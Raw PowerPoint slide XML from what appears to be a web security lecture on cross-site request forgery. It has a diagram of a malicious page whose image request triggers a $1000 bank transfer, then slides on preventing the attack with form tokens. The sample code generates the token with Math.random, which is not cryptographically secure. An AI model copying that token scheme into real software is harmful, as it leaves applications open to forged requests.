      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005A9040-AB30-4634-BFA4-78714005825B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4411207"/>
            <a:ext cx="10515600" cy="87665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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Used in emails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Opening the mail is enough.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367203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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#8 2013 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCE107A-367E-4A91-B795-E8AB39C6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1365" y="1252071"/>
            <a:ext cx="1372107" cy="1373793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364EAECD-4B29-4766-9148-33F2CC83ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837445" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C577EFEA-BBCE-4D19-A16A-91755058A587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857318" y="2394213"/>
            <a:ext cx="1600200" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B96A42-9C17-4E25-8524-23782D6448CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144138" y="2315158"/>
            <a:ext cx="1828862"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Bank Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F445CD2-8DBF-4034-A1A1-3192CF296F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5657418" y="2818945"/>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D0E7786C-A90E-4105-9846-FBFFB54AD2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10058569" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E25A37-7A9A-4A44-88DF-CB64CA49AE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219000" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30805EEB-2ABF-4B8E-8356-E2FBCCAD9AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1440124" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABC3E942-27B2-4137-865F-2711072EE5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411648" y="2349688"/>
            <a:ext cx="2056953"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Bad Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94361FBD-BEF1-4A65-A3AC-B83655902005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715015" y="2898305"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1791026D-AB96-4772-8260-C4ABA0A95DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6368475" y="1974975"/>
            <a:ext cx="2591805"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Login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: Lisa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lisaRules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55AA764-90AC-4211-88B5-40DFF992A820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10211170" y="3053492"/>
            <a:ext cx="131491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solidFill>
              </a:rPr>
              <a:t>Creates session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06D2ADA-C4C2-46E3-B670-70DB62CD6615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9979104" y="3175926"/>
            <a:ext cx="0" cy="32927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A34134B-DF99-4D25-A027-70B63C1E7AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5732763" y="3541940"/>
            <a:ext cx="4170997" cy="145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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F924D3FC-B6B6-401F-95A0-95E70AC22D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916700" y="3634063"/>
            <a:ext cx="206240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Create cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With session id. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38468B52-F232-4A07-B31B-5648AD48D06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1589286" y="3798399"/>
            <a:ext cx="3998716" cy="28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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85089FC5-B360-4370-87F6-CA2763FD3379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129209" y="3384789"/>
            <a:ext cx="137340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 page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94B0119-EA88-4E8B-8124-DAE0377425ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566000" y="4417265"/>
            <a:ext cx="140046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Page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With bad image.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A7320A-CF57-4B98-B0DF-A2D525E8D31B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566000" y="4228936"/>
            <a:ext cx="4006494" cy="504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8A61394-DD0C-4829-933C-0BA04B05E786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5742343" y="5605929"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F08715-2F1F-465E-8288-FAA1E34A4268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5709556" y="5712917"/>
            <a:ext cx="2477095" cy="120032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Transfer Money</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From: You</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To: Hacker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amount: $1000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Connector 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D08A3F-198E-4476-A418-AB65D6B3D71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5657444" y="4815278"/>
            <a:ext cx="0" cy="687877"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D31F3B-3B15-4689-BC7D-ABBFFE3625D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662416" y="4815278"/>
            <a:ext cx="385750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Display page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sends GET request for image.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22082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27" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>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Preventing CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2838726"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Can we protect ourselves against unintended client requests?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Yes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>User actions come from POST requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>So a form must be submitted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>When the user requests the form, generate &amp; add a token (secret) to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>When we receive the form, check if the same token is received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215685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CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D5E3EE-389A-49A9-A2E6-810D6FCD0B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522514" y="1569506"/>
            <a:ext cx="11146972" cy="5167825"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/transfer',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err="1">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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Math.random</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response.send</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&lt;form action="/transfer" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      From: &lt;input type="text"   name="from"&gt;   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
